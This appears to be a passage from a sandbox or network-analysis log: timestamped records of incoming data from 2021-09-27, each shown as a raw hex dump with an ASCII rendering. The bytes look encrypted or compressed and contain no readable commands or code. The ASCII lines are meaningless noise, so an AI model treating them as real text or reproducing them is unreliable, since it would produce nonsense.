                                                                    2021-09-27 12:27:48 UTC178INData Raw: d1 60 01 a4 9b 4e 48 48 89 2b 4f 10 e6 d3 94 93 60 61 77 0a 71 33 69 33 06 84 e5 ce 27 e2 fb c3 72 d5 20 15 2e bb a7 4f 81 5c a6 67 96 9c 88 7e 68 dc 65 a3 73 30 b4 71 68 3b 07 ab 11 2b 97 5a 8d 02 8f 29 72 55 c4 fc c6 13 68 47 ee 87 7f 2e f8 f8 0c 59 41 c5 a5 29 cb 3a 48 ff d3 62 bf 86 85 7b 3e c2 b7 a6 8e d9 3d ec 46 7c 7a f4 11 5a 5a 74 b2 12 eb 94 1e 27 ed 30 84 ef 1a 68 8e b9 17 40 85 a8 b2 8e c4 66 83 e1 50 9c 5d e0 9f 17 5f 75 43 cc 2b ea 54 22 ee 31 b8 c6 b7 c0 3a 83 94 a1 36 a8 dc 62 36 f5 75 5e c5 7a 8f cb 52 4b 7b 16 7f 65 02 f9 74 4f f1 ef ae 58 72 8e d3 ff 02 f1 e9 ef 78 86 ee 73 2e 0e 03 2d 92 f5 70 1b a0 2a 4e 40 dc 10 83 37 16 76 8d c1 b8 96 29 84 22 63 03 31 49 46 8f 39 5a 0d 54 67 6b b3 56 58 8a b2 a6 84 3a 8e 8d 80 7f f0 47 47 5e 94 b8
                                                                    Data Ascii: `NHH+O`awq3i3'r .O\g~hes0qh;+Z)rUhG.YA):Hb{>=F|zZZt'0h@fP]_uC+T"1:6b6u^zRK{etOXrxs.-p*N@7v)"c1IF9ZTgkVX:GG^
                                                                    2021-09-27 12:27:48 UTC179INData Raw: 4b bf 98 14 0e 56 ed ac 4f 0b 1b 91 87 84 41 53 a9 14 a9 8d 22 43 cd 63 39 f3 79 5a 67 76 cc 84 74 52 1a 37 4c 1e a5 93 f5 52 51 5e 0c a3 bd 5b a6 59 96 b6 1e ee b1 ab 30 db 3f 97 39 6f dd 39 52 bc a7 d2 57 ae 0c 16 82 92 97 23 7e e6 7a 09 5d e1 94 fb 59 a2 51 a9 28 13 29 58 ae a7 fe 05 a4 3f 4b 6d 96 4f ac 34 57 c2 08 8a f0 2b 6c 91 14 c0 11 ce 47 2d f1 a5 71 82 a4 36 3a 1e 92 3f b1 22 41 97 c2 00 38 d4 5d fc 2c 6d 0d e9 37 a5 70 1e 3a bb 28 48 c8 26 23 5b 49 aa fb 7f 4b 12 d0 9b d0 52 5c 7b 4d d8 80 d3 3a 01 2c 76 91 d0 bf d3 9c 6d 8e bb a8 2e fb 10 e9 a2 4c b5 99 7d 7c e6 f0 77 a6 a2 d3 22 3f 86 32 02 40 29 ac a7 86 b2 aa 53 e0 f9 19 7c 5b d2 96 cc 4d 50 c4 d2 39 42 39 83 7e 00 fd f0 50 3d cd 07 c0 a0 bc 4d e1 5d 4a ea 57 83 f3 bc 34 5d c5 fe b2 ba ee
                                                                    Data Ascii: KVOAS"Cc9yZgvtR7LRQ^[Y0?9o9RW#~z]YQ()X?KmO4W+lG-q6:?"A8],m7p:(H&#[IKR\{M:,vm.L}|w"?2@)S|[MP9B9~P=M]JW4]
                                                                    2021-09-27 12:27:48 UTC180INData Raw: 85 3c 07 b7 f5 27 be ab 59 2e f8 22 f8 44 a6 b3 11 c9 f5 b6 55 3a 44 b4 fe fa 79 77 9f ef 4e 32 a7 39 ae ab 28 8f de 34 f8 fb c1 e0 2b 0b 12 a2 a7 02 42 14 61 db 93 a3 71 b9 2a 68 9f 6e f0 1f 81 fc 9d b1 34 9b 56 b4 5d 85 56 c8 d4 4f 74 13 0f 12 49 61 b7 99 41 1d 8c 5c c0 f8 77 7f 4e 57 07 d6 37 23 eb 90 4c 90 75 48 cd fb 69 45 f8 06 44 3a d7 7a 36 c4 3a ba 32 c0 d9 df bd 0e 44 51 f4 5c 29 b9 36 7d ed 87 1d f9 f6 a1 20 8a 70 c6 cf 70 92 1e 17 94 ed 11 ee ab 30 48 1d e5 7b 3f 69 8d e8 d4 59 13 6f d7 0b 1d f9 2b 57 4c ee ec fa 5e eb 38 fe 14 c4 6d ed 14 a5 1c bf d0 e0 67 58 89 42 02 9b d4 4f 48 c8 e9 34 87 a5 79 60 5b 74 30 52 64 82 cd 65 1d 44 9c 59 62 7a d8 65 3e 75 0b 11 85 87 a9 f9 b4 4c 30 9a 64 08 fe 49 8c 74 49 31 ec bb 23 f3 df d1 85 07 ac 71 72 97
                                                                    Data Ascii: <'Y."DU:DywN29(4+Baq*hn4V]VOtIaA\wNW7#LuHiED:z6:2DQ\)6} pp0H{?iYo+WL^8mgXBOH4y`[t0RdeDYbze>uL0dItI1#qr
                                                                    2021-09-27 12:27:48 UTC182INData Raw: 8a ad f5 d3 94 14 42 0f 33 c1 26 79 2b 32 10 e5 7e 96 d5 63 87 e3 77 32 5a 99 33 7b 84 c1 63 25 15 ed 25 e6 a8 20 b3 de bb da 4f c4 f1 a4 1d 95 7a 1c 03 05 76 95 a3 0e 30 d2 dc 6a 0f 10 4d 85 56 27 a6 7d 02 f2 29 f5 f8 c6 58 c5 f5 fc 3a 79 71 8f 2e 85 f8 a4 f4 43 9b b2 cf 5f 47 bf da 22 62 c2 86 4c d6 3c 0c b4 40 1a a4 f2 df b7 7c 07 f4 fa f7 58 aa a5 f4 7f e9 3f 41 1c 30 f9 ef 17 c2 8c a1 13 a6 11 d5 4b f3 35 66 fe e1 7e 36 5f 3f 86 f1 cb 08 08 64 da ea 29 22 a1 9b ba 84 b3 26 ae fe a0 1d c7 a8 a1 62 47 5f 77 44 de 9c 1b b6 64 a2 8a 16 02 65 90 53 76 23 f5 09 3a 25 2c 75 22 ff 7f f1 5d 45 7a 6b f1 95 ba 73 3b 00 6c f5 0d 1b 75 80 4c e0 d8 f6 17 4a 9e 4f 73 c1 c5 96 de 2e 20 74 22 d7 dd 3b 8c 6d a4 0d 29 67 72 18 54 92 8e 54 32 f9 17 0d 73 80 02 f0 7d ec
                                                                    Data Ascii: B3&y+2~cw2Z3{c%% Ozv0jMV'})X:yq.C_G"bL<@|X?A0K5f~6_?d)"&bG_wDdeSv#:%,u"]Ezks;luLJOs. t";m)grTT2s}
                                                                    2021-09-27 12:27:48 UTC183INData Raw: 61 13 f4 4a 59 0c 69 37 29 29 ac 32 0b 23 40 85 dd 46 b5 3d 69 64 0a e6 43 b0 63 60 22 7b a4 66 90 58 f9 17 e8 de 37 31 1e de 42 f7 88 56 b8 98 de 32 9f 62 59 eb b6 83 3f b3 d1 32 3d ab ea ae 6b 18 39 2f bc 18 03 55 a6 06 f0 16 ef 60 21 bb e6 07 09 bc 30 96 5c 5b 44 c5 d4 e9 53 ec 58 d3 a7 fc db a6 74 5f 8b 02 32 93 73 92 c2 75 8a d4 f5 6e 40 16 26 85 b3 ac a1 34 a5 0c 82 e1 e8 38 8d 86 d9 25 5f 2e 1c 07 00 45 d4 3b 22 2e 72 0e 0f a3 d8 65 d7 ff bb 55 48 40 f8 21 ac 5c 4c 6f 02 c7 d8 15 9b ad 52 f6 a5 4f 91 83 35 ae 7c 6a 63 53 d0 c2 d3 57 b3 8c 41 be c8 6f 6d ea b8 8e b5 e4 7d 90 38 f2 0a a5 44 47 5f 4f d7 f0 02 3d 29 a2 78 84 85 bd b5 74 84 aa 27 99 d2 eb cc 7d 8f c6 75 3a a4 ad fe e4 9d 3f f0 2d 3d 9c d8 c2 c1 ab ab 75 20 b0 60 95 83 8e bc 46 82 c7 2f
                                                                    Data Ascii: aJYi7))2#@F=idCc`"{fX71BV2bY?2=k9/U`!0\[DSXt_2sun@&48%_.E;".reUH@!\LoRO5|jcSWAom}8DG_O=)xt'}u:?-=u `F/
                                                                    2021-09-27 12:27:48 UTC184INData Raw: b1 3e e0 11 41 bd 19 3d 27 c3 ab 3d eb fa 13 fe a2 32 ce 51 11 3d b6 28 3a c1 71 fc e7 4b 91 0b 92 55 d9 6f 39 d3 ab 8f 4a dc 6f fe 1d 55 9d 5f 17 db a2 da 02 8b d1 63 7d a1 45 e5 c4 31 3f 56 6e 8d 1f 6b 39 9f 34 32 7d c2 c9 c3 e4 9f c8 a9 4f 7f d1 0d 12 7c 87 23 e4 19 89 45 5c bd f8 5a bd 4c 7d 06 30 a3 5e 23 37 85 90 08 48 83 39 6b f7 fe e0 d0 47 11 ab ff c4 47 ba 42 02 db a2 bc e8 d0 2c e6 bf e0 b9 4b 7d 7f 45 1f df f1 47 b4 f7 4c d6 19 70 ef 1e a3 56 ef be ef 4d a4 35 21 ca ad 3f 14 8d 3e 16 5b 4f 68 31 9f 60 29 7c 81 4c 93 ec 02 9c e9 39 fc f2 50 10 8b 7e 73 1c c2 d0 f9 a4 5a 54 45 e4 0f a9 e3 dc 1e e9 49 87 9e ba 62 26 76 d6 c6 19 18 79 b3 1d 39 9c 05 a1 78 d3 6f d8 e1 76 eb 74 51 a9 84 b4 31 f3 98 ce 0a 18 dd f1 b0 be e7 ec c6 23 6c 1c d3 cb 13 4a
                                                                    Data Ascii: >A='=2Q=(:qKUo9JoU_c}E1?Vnk942}O|#E\ZL}0^#7H9kGGB,K}EGLpVM5!?>[Oh1`)|L9P~sZTEIb&vy9xovtQ1#lJ
                                                                    2021-09-27 12:27:48 UTC185INData Raw: 51 5c 3b 14 4e 29 d3 e9 14 dc c6 31 48 02 9f bf 4f 57 e1 a3 96 a8 63 38 2a 75 71 5f 7f a7 06 54 e4 be 25 68 ed c5 2f aa 20 9b 38 2f a7 32 86 2c a4 60 95 78 ea 01 68 73 73 37 73 57 b6 01 6a 72 10 69 73 54 97 8b 9b 96 8f 01 7b 25 c6 25 c5 b3 0a 38 ee 74 69 ba f8 66 0e 29 43 e6 b2 a7 a9 45 48 ea c4 f1 a7 c7 a0 6b 3e 71 b4 40 8c a5 3d c8 70 7c 7a f5 11 cc 5a ba b5 f5 e9 e9 1e 60 ea 33 84 ef 1a ee 9e a2 13 a6 87 c5 a2 f2 d3 64 83 e1 70 0a 5d 3f 86 f1 7d 0a 43 55 3c e9 74 23 ee a7 b8 85 93 24 38 fe 94 0b 31 a8 dc 62 36 60 55 46 de 9c 8d b6 72 94 6c 14 7f 67 02 6c 74 23 f5 08 8c 21 72 73 c4 ff 22 f5 e9 79 78 7b e1 96 2c 73 03 23 9a f4 70 1b a0 ac 5e e4 d8 f6 81 5a 06 4a 95 c3 b8 86 39 11 22 74 22 c7 5b 3f 8f 58 42 0f 74 66 6b 25 56 92 ae 56 a4 f9 3a 0c b5 85 7f
                                                                    Data Ascii: Q\;N)1HOWc8*uq_T%h/ 8/2,`xhss7sWjrisT{%%8tif)CEHk>q@=p|zZ`3dp]?}CU<t#$81b6`UFrlglt#!rs"yx{,s#p^ZJ9"t"[?XBtfk%VV:
                                                                    2021-09-27 12:27:48 UTC187INData Raw: fb ed 92 9f 10 7a 5a dd 99 a8 0f a5 e7 25 4c 92 1a 7f af 4c 45 2c aa fb ba ee 01 d8 cc 63 09 fd 7a 3d 67 6b e2 07 75 75 39 b6 65 86 a6 9c f4 12 5f 78 0e 47 bc b9 aa 9b 96 2f 1f 1b a1 4c 31 ec 3c be 26 26 ff 9a 53 b7 bd e7 54 17 07 cb a5 46 94 b0 5c b3 73 40 5c ae 95 29 4b 57 53 75 29 c9 1c 9e ad 46 ff a8 81 bc 5c ea 95 26 8f 81 77 69 09 96 f8 65 6f a1 17 fd 03 53 44 94 d3 c2 67 64 a6 69 3a b6 a9 2d b0 5e 43 06 c4 11 38 dd 5f 51 09 b2 0e 0e 37 d2 7d 9b 18 b0 2a 67 e5 be 27 b5 5e 6f dc 16 4f dd f1 2c fe 48 58 c4 4f ff 90 15 3c 5d 2e 2a 85 f7 bb d2 9e 23 bd 68 ba f1 fb 9d fe bd 6c 26 98 c9 77 42 f4 4b a7 d0 d8 68 3b b3 17 92 55 14 a8 f8 86 1b 97 ed e6 4d 19 79 72 99 97 05 4d 2f c3 5b 3b 6d 3b 4d 73 c5 dd bb 52 df e4 e1 c4 88 a9 ee e1 57 4e 09 71 bc fa cb 30
                                                                    Data Ascii: zZ%LLE,cz=gkuu9e_xG/L1<&&STF\s@\)KWSu)F\&wieoSDgdi:-^C8_Q7}*g'^oO,HXO<].*#hl&wBKh;UMyrM/[;m;MsRWNq0
                                                                    2021-09-27 12:27:48 UTC188INData Raw: de a8 77 9e 28 7c 8d 60 03 36 fe 99 ba 3a 58 88 eb b0 f4 8b a0 f5 34 01 db 8d 51 01 61 31 fe ae 4f 20 af 2e 4a 9e 8d 87 ab 17 2c 48 da 0b f4 d1 c9 cc 2f da 29 73 ad 53 46 d2 44 a7 ab 2c 77 55 3d c8 ba 2d f4 24 a4 79 9d 65 36 cc 66 75 59 76 78 fa c7 45 7f b4 0e e7 70 5c b7 d5 40 3e 82 62 cb 51 77 a6 47 42 0d 21 34 7c c7 f1 66 f3 74 10 c2 25 62 86 fa 7f 75 a7 de 30 19 fd 1f a9 32 4f dd 99 99 fb 46 0d f0 80 23 a8 36 4c e9 ec 0e f1 f0 cb 22 c4 78 0f f4 c3 92 cc 17 e2 e6 b7 eb e9 01 d2 16 e7 4a ad 67 95 e4 6b 58 9d 4f 21 02 e1 fd 5d 42 8e ee 6d fe 41 fd fd ff cb c4 30 df dd 9d af be eb c5 31 58 15 44 44 bd f0 43 56 fc 0d 19 e0 a9 86 63 44 5a 56 5c e8 80 d3 4f 8f 48 75 5b e3 54 7b 6a 79 73 17 21 c2 bb 02 f9 52 61 38 96 67 0e 48 41 a3 79 e6 01 d5 9e 86 f4 15 d1
                                                                    Data Ascii: w(|`6:X4Qa1O .J,H/)sSFD,wU=-$ye6fuYvxEp\@>bQwGB!4|ft%bu02OF#6L"xJgkXO!]BmA01XDDCVcDZV\OHu[T{jys!Ra8gHAy
                                                                    2021-09-27 12:27:48 UTC189INData Raw: 5c d7 84 42 ca 3f 8b 74 ea a9 93 e8 42 aa 3b ca 05 63 29 91 3e c8 44 c5 d4 89 89 49 74 8d 5f f0 2b 75 82 e1 59 55 14 4c 22 74 a9 52 9a a5 be a3 4e f3 cb 46 1c c4 7e da 26 44 66 1a a5 d6 27 2e fc e9 09 2b 68 00 56 1e 8d 3c 0c c6 28 e3 c5 ff 7d 05 f5 fb 3c 49 78 20 2d 09 f8 24 c7 ef 80 2b c9 f2 62 5b ea 5d 66 7b a4 48 f6 a7 0a a2 54 58 bf 94 dc 83 65 71 e8 a0 ca 61 8f 54 f6 40 ef be 63 eb 2e d5 eb 10 ea a0 a0 02 a0 68 f2 fc ea 82 60 2a d3 e1 0e 0c 3b 33 f4 ec 0c fa 53 07 cd 00 3e cf a6 83 a1 73 26 19 ff 38 30 04 ae 15 64 fa 6d 5d 47 ff 9d 76 90 40 8d 4d 15 84 43 18 72 8d 23 ec 2e 77 27 d3 75 ff d8 11 f1 80 79 26 58 84 88 dd 73 b5 3c f0 ea b4 1b 9b 99 5d e0 69 f7 39 44 5f 48 51 c3 ba a5 10 18 e6 74 11 df 8b 30 03 58 da 15 94 6c da 24 7d 88 ab 50 75 ff cc 0a
                                                                    Data Ascii: \B?tB;c)>DIt_+uYUL"tRNF~&Df'.+hV<(}<Ix -$+b[]f{HTXeqaT@c.h`*;3S>s&80dm]Gv@MCr#.w'uy&Xs<]i9D_HQt0Xl$}Pu
                                                                    2021-09-27 12:27:48 UTC191INData Raw: 24 0c 3c c9 84 18 30 3f f5 73 5a 23 7a ad 04 93 af 6c 2e dc 00 e3 dc f3 9b 3b 69 cd 11 4c 71 e8 67 38 61 c0 8c 42 91 b7 fd c5 de 84 31 7d 1a 8a 13 15 82 37 b9 3e cd a6 ae 35 5b a0 ad 13 7a b0 d9 bc 2d 01 c0 e8 6f 6c 2e 1b bd 76 44 6c 83 c6 f0 01 ee 6d 0e 03 e7 23 08 dd 67 cb 76 42 4c 68 f1 3b 57 2b 52 95 82 ed 93 e8 75 7c ae 53 35 c0 53 c1 ee 98 8a e1 bc fb 58 94 20 02 b2 6b 89 17 a2 1d 83 e8 90 1f 89 f7 dc 3c 45 36 16 80 00 25 de b7 68 fd 70 aa 3c 7d f4 59 da 22 9c e8 48 bc b1 51 ad bc 4d 8d 03 39 fd 52 9e a4 53 2e ec d0 96 e2 35 5b 4e a3 4a 8c da 84 f6 04 f8 cf 49 85 ed ea 6d a0 98 53 92 59 7d 72 70 fd 0a a5 44 df 5f 2e d2 16 00 52 29 b9 31 ba 87 b5 b5 fb 84 25 08 71 d0 bb cc 4d c6 cc 75 7f a4 c4 f7 70 98 90 f2 36 37 cf 91 8d c1 d0 a1 eb 20 1b 50 c1 8b
                                                                    Data Ascii: $<0?sZ#zl.;iLqg8aB1}7>5[z-ol.vDlm#gvBLh;W+Ru|S5SX k<E6%hp<}Y"HQM9RS.5[NJImSY}rpD_.R)1%qMup67 P
                                                                    2021-09-27 12:27:48 UTC192INData Raw: 47 b1 5f c9 99 6e b1 5e e1 ac 41 42 0d 5b 24 95 ab 1c b8 58 12 d5 a2 e1 ce d1 13 f0 b4 10 3a 84 23 ed e7 56 91 7d 93 65 cf cc 3b ae a9 3b 19 c3 6f fe 1f e8 9d 6e 14 1e a2 7c 09 07 82 41 7e ba 47 36 c4 eb 2b 5b 6c ea 1d 60 69 76 34 1a 7f b7 cd 86 ec 3c ca 17 4a df 97 4a 12 d5 80 c6 f3 42 9c 6a 59 b3 ef 74 eb a7 7a 75 27 36 5c e2 3c 10 85 76 4a 8e 67 ea f7 bb e0 62 4b 1c ae 5c c6 fa ad 21 5b 9c a2 3c da e5 3e 3a 9b a6 89 95 6f 36 31 12 df bc 4f 33 f7 27 c7 ec 72 f2 16 02 02 8d b6 f6 4d c7 3d 06 ce b3 35 76 8d 10 4a 78 4f 76 38 26 60 ae 6e 56 4e b9 e4 c9 c8 bc 31 cb f2 d8 19 d4 7a 8b 17 84 d0 fe f8 65 54 5b ed a6 a9 51 ce b5 eb 63 8f ea ef 37 2e 27 d6 07 11 d1 7d 02 17 30 9c a1 fc 0c d3 97 d0 f5 76 37 5a 41 a9 e7 bd 56 a5 84 c7 0b 18 f4 df 74 ba 55 ee bb 23
                                                                    Data Ascii: G_n^AB[$X:#V}e;;on|A~G6+[l`iv4<JJBjYtzu'6\<vJgbK\![<>:o61O3'rM=5vJxOv8&`nVN1zeT[Qc7.'}0v7ZAVtU#
                                                                    2021-09-27 12:27:48 UTC193INData Raw: c5 2e b1 23 ec b2 51 c8 3b 94 4e da d1 95 14 5d 98 26 48 00 9f 09 4e 07 e6 44 94 f4 62 90 75 75 71 7d 7e 28 06 85 e5 7b 26 0c ed 27 70 8c 21 80 38 b8 a7 6a 80 d1 a6 1f 95 5c 8b 1e 68 72 73 86 72 2d b4 e5 68 27 11 52 13 57 97 a2 9a 1f 8f 2b 72 e9 c5 79 c5 f4 6a 11 ef 55 69 2e f8 d6 0d ec 41 9a b2 e0 c8 64 48 e8 c4 50 be a3 85 ec 3e 3d b5 65 8c a6 3d e8 50 59 7a f5 11 ff 5b 8d a5 f6 e9 dd 1f 59 fa 33 84 da 1b d7 8e a3 13 90 86 fe b2 f7 d3 53 82 ca 50 08 5d 07 87 dc 5d 09 43 6c 3d c5 54 20 ee 9d b9 ab b3 27 38 c5 95 34 21 a8 dc 5e 37 52 75 45 de a1 8c 87 52 92 6c 2a 7e 56 02 6e 74 1c f4 3a ac 27 72 33 c5 c8 02 f0 e9 38 79 5e f1 97 2c 31 02 04 8a f6 70 58 a1 8b 4e e2 d8 b2 80 73 16 48 95 86 b9 af 29 10 22 3d 23 ec 4b 3a 8f 12 43 34 54 65 6b 6e 57 af 8e 55 a4
                                                                    Data Ascii: .#Q;N]&HNDbuuq}~({&'p!8j\hrsr-h'RW+ryjUi.AdHP>=e=PYz[Y3SP]]Cl=T '84!^7RuERl*~Vnt:'r38y^,1pXNsH)"=#K:C4TeknWU
                                                                    2021-09-27 12:27:48 UTC194INData Raw: 00 38 29 d3 31 d5 84 52 b4 14 85 7d 0c f1 d6 dc cb 17 c1 a5 72 55 a3 85 f9 af 9f f3 fa 61 37 88 9a d3 d1 8c bb 9a 32 04 43 ed 95 5b a8 82 df 01 3b 63 48 30 b5 a3 de 33 9f 20 d4 ac 8f 98 5c 8e 13 73 22 df 09 74 33 e1 61 04 f0 c9 af c4 5f a4 77 64 18 ad ad d5 73 44 39 ed 24 55 a8 f6 bb 3a b9 e7 4e a6 ca bc 01 90 7a ce 02 0f 73 30 ad 72 30 f7 e6 03 0f 52 4c 12 56 d4 8a f6 00 88 2f 73 c3 c4 59 bc f5 36 0b ec 74 69 2d 83 f8 92 ff 43 9b f4 ce b4 47 8a fc c6 60 bf 87 fa ed 99 1c b6 40 8c a5 bc da 81 4c 78 f4 11 cd d9 aa 98 d3 ee e9 1e 71 7f 32 21 de 1d fe cd a0 94 a6 77 d2 b0 f6 90 65 0a e1 5c 3a 5e 3f c5 f0 d6 08 da 64 3f e8 54 23 5d a7 6f 8e bb 26 7b ff 21 1b 7f ab dd 62 36 62 b4 44 d6 b2 8b b6 52 91 af 14 87 48 04 6f 74 22 30 09 49 2f 74 73 c4 fc c5 f1 90 52
                                                                    Data Ascii: 8)1R}rUa72C[;cH03 \s"t3a_wdsD9$U:Nzs0r0RLV/sY6ti-CG`@Lxq2!we\:^?d?T#]o&{!b6bDRHot"0I/tsR
                                                                    2021-09-27 12:27:48 UTC195INData Raw: b1 a5 88 05 52 29 83 04 5f ba 7d 69 52 2b f8 2c 98 1f ed 6f 9a 36 76 52 15 b7 ef b8 b4 09 e7 9a 88 4b 18 0c b0 74 f2 40 ee da 62 f3 2b 90 cb 70 0b 73 6b d6 15 b7 e2 e5 6b 7e 90 3f 35 ff 2f 67 41 aa e0 2e 66 7e 46 87 bb 07 b5 cc 28 a9 78 41 41 8a 06 4d 33 16 c8 13 fd ab b0 1a 8a 57 47 21 7f d1 6c 9a e6 17 b8 4c 9c bd c7 c6 5b d2 f4 1e 3d f3 d1 74 7f 3d ad 7b 6f b6 79 52 dd e5 44 35 e4 06 93 c2 ef f3 43 5d 81 38 09 3b 35 94 3b 19 44 3b 96 28 1f 47 1b ed a7 bc d0 a4 37 1c 8b d0 71 ac 17 37 c0 4e c9 f0 fa 2f 40 5e 65 13 d2 04 a5 b0 e4 71 e1 e7 a0 5e ce 86 bc f0 5f 27 7e e1 65 7b d4 35 29 2c 30 4d 3e 0c ea 47 ea 58 94 69 7a 8b f1 0e 98 6c 74 c1 2f 72 ca b6 dc fd 64 64 de 7f a7 b7 77 7a 4e 6a 55 f1 d2 fd 97 9c b8 ca 41 fa 8c f9 28 ad 90 2e f3 99 3a 38 70 b8 4e
                                                                    Data Ascii: R)_}iR+,o6vRKt@b+pskk~?5/gA.f~F(xAAM3WG!lL[=t={oyRD5C]8;5;D;(G7q7N/@^eq^_'~e{5),0M>GXizlt/rddwzNjUA(.:8pN
                                                                    2021-09-27 12:27:48 UTC196INData Raw: 64 2b 03 52 d2 f7 12 43 a0 df 16 e0 bc ae 81 2f 4e 49 f3 9b b8 f1 71 12 60 2d 22 94 12 3b cb 01 42 4a 0d 67 2d 7c 56 d5 d7 54 ec a0 3a 6d cc 82 1d a9 47 b2 07 da fd 2a b1 5b b9 87 27 5e 0d bc 7c be e9 03 b8 bb 49 fe e6 fe ce 54 48 db f2 0f 3a 03 78 fe af 11 91 fc c8 4e ad d3 3b cd f1 28 7d 84 6f 9b 47 c3 fb 71 14 5a fa a7 65 27 f6 3e 0b c0 29 06 a1 75 77 b0 1f 95 6b de 1c fc 58 47 18 0b 96 5d a5 18 ca 97 2e 74 c1 6e 12 39 e6 b5 a2 20 9e e4 3f c0 b0 16 e9 2f 1c 06 52 54 5e 88 55 63 f6 14 48 a8 0c 69 91 9f e0 21 26 d7 d4 78 c6 5d df 46 09 9d c3 c8 89 46 5f 91 cf 59 ff 57 09 8c 11 4d ad 9e 33 47 94 04 aa 9b 36 f3 6a 76 02 aa db 9b 02 50 5f 78 ad 3f 79 08 f9 89 42 09 3d 07 5b 6c 03 8d 22 06 3a 8f ec aa ba 84 49 99 80 b2 69 a9 1b e1 7f bf 92 82 f1 1b 36 45 a0
                                                                    Data Ascii: d+RC/NIq`-";BJg-|VT:mG*['^|ITH:xN;(}oGqZe'>)uwkXG].tn9 ?/RT^UcHi!&x]FF_YWM3G6jvP_x?yB=[l":Ii6E
                                                                    2021-09-27 12:27:48 UTC198INData Raw: 5e bb 7a 4d 25 5a df 50 e1 e0 bd f4 86 e0 4b 6b 11 b7 f3 cc 0e b4 a1 11 5f ca 4f 97 1f f4 9a 93 33 55 a8 91 85 af cf e2 8d 56 25 3b 16 81 b1 d9 53 a2 ab 66 df 2a 83 ca 34 ca 7c ef 3b 8a bf e2 7d 30 f6 5d 25 67 f1 5d 19 71 94 2c f5 b7 0f e2 75 3e 34 31 0a 5c 63 f6 84 3a 4b 70 ed 6c 34 c1 53 eb 57 ca c6 2d ed af a6 54 c6 1f f8 6a 09 1f 1a db 12 52 d8 82 68 5b 7f 09 7c 23 f5 e7 fe 00 e8 4c 06 9c 8c 39 ab 91 06 5f ee 26 1c 42 8c 91 61 aa 07 f2 d7 a3 ad 0f 29 84 a0 0c da 86 d6 8c 58 69 fc 21 e2 c0 51 bf 51 2c 0f 9a 65 a5 37 cf f1 8d 99 8c 56 11 94 56 e8 8a 1a ac eb cd 76 c7 f4 b0 fa 97 bd 00 ef 84 50 49 2f 5a e7 85 38 40 22 3b 58 84 31 22 a9 c2 cc d0 ca 56 5d b8 e6 74 4c e2 bd 0c 52 0f 10 44 b6 fd e3 d2 3e f5 6c 46 1a 06 76 0e 1a 44 99 6c ac 61 1d 04 aa 91 6d
                                                                    Data Ascii: ^zM%ZPKk_O3UV%;Sf*4|;}0]%g]q,u>41\c:Kpl4SW-TjRh[|#L9_&Ba)Xi!QQ,e7VVvPI/Z8@";X1"V]tLRD>lFvDlam
                                                                    2021-09-27 12:27:48 UTC199INData Raw: 8c 9b 63 e2 c7 bd 05 55 06 b9 3e 6a e7 7d 12 7a 30 ce 3c 87 0a bc 01 ab 12 76 52 38 d8 d8 9c b4 08 cf e9 be 65 6b 2e f1 20 c8 78 be da 51 80 2c d1 99 76 3c 16 7d e4 70 f0 c4 e3 43 70 80 2f 59 d7 1c 62 59 a6 cd 2e 78 6f 43 e2 b1 23 d2 ca 1d cc 10 47 24 b9 28 5c 1c 1b cb 07 e2 aa aa 00 8d 4c 50 4c 5b c1 6c 81 e7 24 fa 7c b1 ca f7 e5 39 fa d3 4d 0c d0 a5 57 3d 79 8f 55 0a 8a 5e 52 db c2 30 08 e5 67 9e d7 9d fe 75 38 e4 2e 61 2f 12 f5 38 08 30 32 a0 41 34 4b 2e da d5 97 f1 d1 00 3a 8b c7 66 ed 06 1c b2 6d eb 94 fc 18 34 64 4f 71 c6 33 c0 d2 e4 1e ef d4 c9 56 e8 f4 9e d6 31 24 4f 80 76 5d b0 1c 1e 58 00 67 6d 40 ac 15 d2 5e cc 41 2c 89 c4 57 de 35 2e 8c 76 2e fc bb fc bc 22 17 88 34 e6 ec 47 5c 3d 58 12 c7 bb dd a6 e8 9e 8e 06 db a6 9c 1f 88 e4 0d d3 da 12 18
                                                                    Data Ascii: cU>j}z0<vR8ek. xQ,v<}pCp/YbY.xoC#G$(\LPL[l$|9MW=yU^R0gu8.a/802A4K.:fm4dOq3V1$Ov]Xgm@^A,W5.v."4G\=X
                                                                    2021-09-27 12:27:48 UTC200INData Raw: 0e 85 c5 5e 1a 75 52 fe 92 20 69 cf da 27 8c bd a5 f5 38 7f 27 f2 c3 fb f9 44 62 43 06 47 84 3f 49 e6 36 25 0f 00 08 38 51 24 fb e0 33 a4 be 5f 78 c6 f6 0d 99 29 b6 5e 89 ec 11 c2 4a 92 ee 2f 60 0d 88 5c cd df 3c d5 d6 57 8c c3 d3 a7 7f 75 db e0 3a 6f 08 4d 90 80 4b c5 f2 de 21 a1 ee 3b c9 ce 5c 46 bb 01 9f 7f af f8 67 7b 5a a0 d4 67 36 dd 04 13 c0 27 1f a1 66 47 d7 6c 97 7a f5 35 d0 47 55 7d 16 a1 5d a4 11 ca 90 27 74 c0 67 12 3a ef b5 a3 29 9e eb 36 c0 99 1f e9 2c 15 06 7d 54 2a 88 5c 63 f6 1d 48 a8 05 69 91 96 e0 21 2f d7 db 7c b2 65 ea 53 25 aa d5 d3 9a 22 64 95 c8 6e bb 75 12 80 61 68 ab 94 0f 43 84 18 cf b9 1e e7 6d 7f 02 a0 df 9b 25 32 52 78 ba 14 78 11 e8 8b 37 2d 2e 0a 5d 6c 30 98 12 0f 4e a9 89 8e 8e 9e 55 90 a2 a7 64 85 7a d2 7b cb 84 85 9c 28
                                                                    Data Ascii: ^uR i'8'DbCG?I6%8Q$3_x)^J/`\<Wu:oMK!;\Fg{Zg6'fGlz5GU}]'tg:)6,}T*\cHi!/|eS%"dnuahCm%2Rxx7-.]l0NUdz{(
                                                                    2021-09-27 12:27:48 UTC201INData Raw: 44 b3 32 3f b1 7b 00 24 44 ac 56 e3 f1 e2 fc 96 e1 74 0a 0c b5 e2 93 04 b2 a1 18 3a f2 5a 8b 12 ec 9e 97 24 74 b9 f4 ad c1 cc ce 97 7f 0c 39 1f e4 a0 c5 47 bf a0 42 b1 13 9c c4 23 ab 4f e3 21 a8 82 ed 67 36 fc 5e 48 64 f2 29 28 7d e6 16 ed b8 0e e2 01 05 18 3c 3e 5d 61 eb 97 31 53 7d 80 25 38 c9 53 f3 79 d5 c0 20 f3 a3 d2 75 f8 7a c6 57 1a 1a 1e a1 21 51 da 83 07 62 10 04 50 24 ee fb ef 6f db 5b 13 ad b7 3e aa 87 07 3a ab 1a 1c 41 f8 ba 62 cf 02 f5 b2 8b a7 47 0d 84 c4 26 d1 86 c2 83 3e 44 da 40 d8 cb 7f b5 3e 12 1f 95 7f cc 13 d9 e9 9d 9d 9d 72 15 bf 5c e0 86 7b 90 8e c3 7d 